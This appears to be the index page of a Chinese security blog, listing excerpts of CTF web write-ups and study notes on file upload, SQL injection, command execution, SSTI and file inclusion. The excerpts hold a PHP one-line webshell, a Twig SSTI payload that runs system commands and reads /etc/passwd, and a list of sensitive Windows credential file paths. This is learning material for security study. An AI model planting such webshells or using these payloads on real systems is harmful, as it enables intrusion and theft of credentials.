CISP-PTE
CISP-PTE
|
WEB |
0 评论
CISP-PTE 2021-12-20简介CISP-PTE考试练习,白嫖题目,使用fofa进行搜索
buuctf WEB从0开始(二)
buuctf WEB从0开始(二)
|
WEB |
0 评论
[0CTF 2016]piapiapia1、访问界面2、目录扫描发现www.zip3、审计代码reg
buuctf web刷题从0开始(一)
buuctf web刷题从0开始(一)
|
WEB |
0 评论
[toc][HCTF 2018]WarmUp1、访问WEB界面,首界面是个滑稽脸2、先右键查看源代码,发现source.php3、访问source.php4、首先看这段代码,需要满足file值不为空,file值为字符串,checkFile为true,满足条件则包含文件if (! empty($_RE
强网杯web
强网杯web
|
WEB |
0 评论
参加qwb,才做出两道题,我好菜。。。。赌徒1、查找到备份文件,www.zip源码<meta charset="utf-8"><?php//hint is in hint.phperror_reporting(1);class Start{ public
Upload闯关记录
Upload闯关记录
|
WEB |
0 评论
开篇🌞学习的好日子PHP一句话木马(摘自先知社区 https://xz.aliyun.com/t/2786)经典语句<?php @eval($_POST['cmd']);?>其中:(1) @ 为错误抑制符号(2) eval 执行php代码(3) $_POST['cmd'] 通过post
SQL闯关记录
SQL闯关记录
|
WEB |
0 评论
开篇学习了sql注入很长时间了,但一直学着忘着,最近正好有时间,再重新学习一遍sql注入,使用sqli-labs进行练习0x01 基础知识(1)连接字符串concat(连接参数产生的字符串,如果一个参数返回NULL,则返回值为NULL)格式:concat(str1,str2,)* concat_ws
命令执行
命令执行
|
WEB |
0 评论
命令执行绕过拼接符号过滤在linux中,&和&&,|和||介绍如下: & 表示任务在后台执行,如要在后台运行redis-server,则有 redis-server & && 表示前一条命令执行成功时,才执行后一条命令 ,如 echo '1
文件上传
文件上传
|
WEB |
0 评论
PHP一句话木马经典语句<?php @eval($_POST['cmd']);?>其中:(1) @ 为错误抑制符号(2) eval 执行php代码(3) $_POST['cmd'] 通过post接收的数据意思为eval把接受的数据当做php代码执行其他函数create_function
SSTI注入
SSTI注入
|
WEB |
0 评论
phptwig{{self.env.registerUndefinedFilterCallback("exec")}}{{self.env.getFilter("cat /flag")}}{{'/etc/passwd'|file_excerpt(1,30)}}
文件包含
文件包含
|
WEB |
0 评论
常见的敏感信息路径Windows系统c:\boot.ini // 查看系统版本c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件c:\windows\repair\sam // 存储Windows系统初次安装的密码c:\ProgramFiles\m